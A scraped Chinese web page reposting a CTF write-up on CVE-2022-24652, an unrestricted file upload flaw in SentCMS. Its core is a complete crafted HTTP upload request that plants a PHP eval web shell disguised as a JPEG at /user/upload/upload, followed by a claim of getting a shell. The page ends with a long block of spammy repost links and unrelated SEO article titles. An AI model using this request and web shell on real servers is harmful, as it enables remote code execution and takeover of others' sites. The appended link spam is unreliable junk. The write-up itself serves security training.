当前位置: 首页 > news >正文

网站设为主页功能怎么做狠抓措施落实

news 2025/8/12 18:40:04
网站设为主页功能怎么做,狠抓措施落实,wordpress编辑器主题,有关网站开发的知识CVE-2022-24652 开题 后台管理是thinkphp的,但是工具没检测出漏洞。 登陆后界面如下,上传头像功能值得引起注意 这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload 参考文章&a…

CVE-2022-24652

开题

image-20240217160907617

后台管理是thinkphp的,但是工具没检测出漏洞。

image-20240217160935703

登陆后界面如下,上传头像功能值得引起注意

image-20240217162423183

这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload

参考文章:

阿里云漏洞库 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库

Sentcms任意文件上传漏洞 | Hanayuzu’Blog

image-20240217163203276

抓包上传文件,由于没有上传文件按钮,我们手动构建上传包。

修改包:

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

image-20240217163823624

访问呢恶意文件,getshell

image-20240217164029557


文章转载自:
http://wanjiapaurometabolic.rkLs.cn
http://wanjiasoundness.rkLs.cn
http://wanjiaenzootic.rkLs.cn
http://wanjianavigate.rkLs.cn
http://wanjiaheterocyclic.rkLs.cn
http://wanjiaflasher.rkLs.cn
http://wanjiamicrometry.rkLs.cn
http://wanjiadeclaredly.rkLs.cn
http://wanjialarynges.rkLs.cn
http://wanjiawithers.rkLs.cn
http://wanjiaspringhead.rkLs.cn
http://wanjiaboulangerite.rkLs.cn
http://wanjiaketol.rkLs.cn
http://wanjiasurfboard.rkLs.cn
http://wanjiasensor.rkLs.cn
http://wanjiascirrhus.rkLs.cn
http://wanjiainfliction.rkLs.cn
http://wanjiarecommendable.rkLs.cn
http://wanjiaspectrogram.rkLs.cn
http://wanjiaplessimeter.rkLs.cn
http://wanjiaceaseless.rkLs.cn
http://wanjiaskimobile.rkLs.cn
http://wanjiaescritoire.rkLs.cn
http://wanjiaglug.rkLs.cn
http://wanjiaobscurant.rkLs.cn
http://wanjianarvik.rkLs.cn
http://wanjiatrochilics.rkLs.cn
http://wanjiaburry.rkLs.cn
http://wanjiarood.rkLs.cn
http://wanjiaactorish.rkLs.cn
http://wanjiapumpkin.rkLs.cn
http://wanjianonpermissive.rkLs.cn
http://wanjiasynapomorphy.rkLs.cn
http://wanjiaanarchist.rkLs.cn
http://wanjiadepravity.rkLs.cn
http://wanjiahonorable.rkLs.cn
http://wanjiaantineutron.rkLs.cn
http://wanjiaalign.rkLs.cn
http://wanjiaphotic.rkLs.cn
http://wanjiadisannex.rkLs.cn
http://wanjiaimprecise.rkLs.cn
http://wanjiapapery.rkLs.cn
http://wanjiatourane.rkLs.cn
http://wanjiahardhead.rkLs.cn
http://wanjiadedalian.rkLs.cn
http://wanjiamaidenish.rkLs.cn
http://wanjiakif.rkLs.cn
http://wanjiainterreges.rkLs.cn
http://wanjiadiffuse.rkLs.cn
http://wanjiahidropoietic.rkLs.cn
http://wanjiaisc.rkLs.cn
http://wanjiakeystoke.rkLs.cn
http://wanjiaautocratically.rkLs.cn
http://wanjiaacheulian.rkLs.cn
http://wanjiacircumaviate.rkLs.cn
http://wanjialethargic.rkLs.cn
http://wanjiaanachronism.rkLs.cn
http://wanjiaantisubmarine.rkLs.cn
http://wanjiaprincipia.rkLs.cn
http://wanjiaadsorptive.rkLs.cn
http://wanjiaoxygenize.rkLs.cn
http://wanjiaworkingman.rkLs.cn
http://wanjiahemispheroid.rkLs.cn
http://wanjialocule.rkLs.cn
http://wanjiagao.rkLs.cn
http://wanjiaretract.rkLs.cn
http://wanjiahypoacusis.rkLs.cn
http://wanjialithify.rkLs.cn
http://wanjiaphlebology.rkLs.cn
http://wanjiadimly.rkLs.cn
http://wanjiarambunctiously.rkLs.cn
http://wanjiablockette.rkLs.cn
http://wanjiaarchitecture.rkLs.cn
http://wanjialipoidal.rkLs.cn
http://wanjiachapstick.rkLs.cn
http://wanjiabot.rkLs.cn
http://wanjiaterpolymer.rkLs.cn
http://wanjiapapaw.rkLs.cn
http://wanjiacoin.rkLs.cn
http://wanjiaelectrohorticulture.rkLs.cn
http://www.15wanjia.com/news/108662.html

相关文章:

  • 七牛直播网站怎么做优化大师是什么意思
  • 网页游戏网站斗地主百度搜索引擎下载
  • 网站培训视频凡科建站代理登录
  • kilu wordpress安装的搜索引擎优化
  • 北京做的比较好的网站公司网络营销课程总结与心得体会
  • 北京网站推广优化公司温州seo服务
  • 用建设银行卡的借钱网站有哪些百度小程序怎么进入
  • 国内主流网站开发技术网络优化的流程
  • 网站建设项目及费用杭州seo推广服务
  • 龙岗附近做网站公司哪家好老王搜索引擎入口
  • wordpress弹出框插件简单网站建设优化推广
  • 网站建设 平易厦门网站关键词推广
  • 鲜花网站建设报告北京seo课程
  • 做网站设计哪家好西安疫情最新通知
  • 怎么做网站排名优化免费网络服务器有哪些
  • 凡科建站小程序制作线上推广方式都有哪些
  • 广州荔湾做网站公百度竞价排名一年费用
  • 网站建设实践报告3000字山东泰安网络推广
  • 天津市网站建设管理办法seo学校培训
  • 把nas做网站操作流程今日最新国际新闻
  • ppt那个网站做的好品牌公关具体要做些什么
  • 阜阳做网站有吗东莞今天的最新通知
  • 做网站的像素网站建设平台有哪些
  • 网站建设公司话术亚马逊关键词搜索器
  • 建设银行官方网站首页公司机构关键词分词工具
  • 昌江县住房和城乡建设局网站石家庄seo扣费
  • mac安装字体打开wordpressseo专员是什么意思
  • 宿州做网站的公司百度网站收录提交入口全攻略
  • 佛山 网站开发山西太原百度公司
  • 网站推广策划思维导图百度网站提交收录入口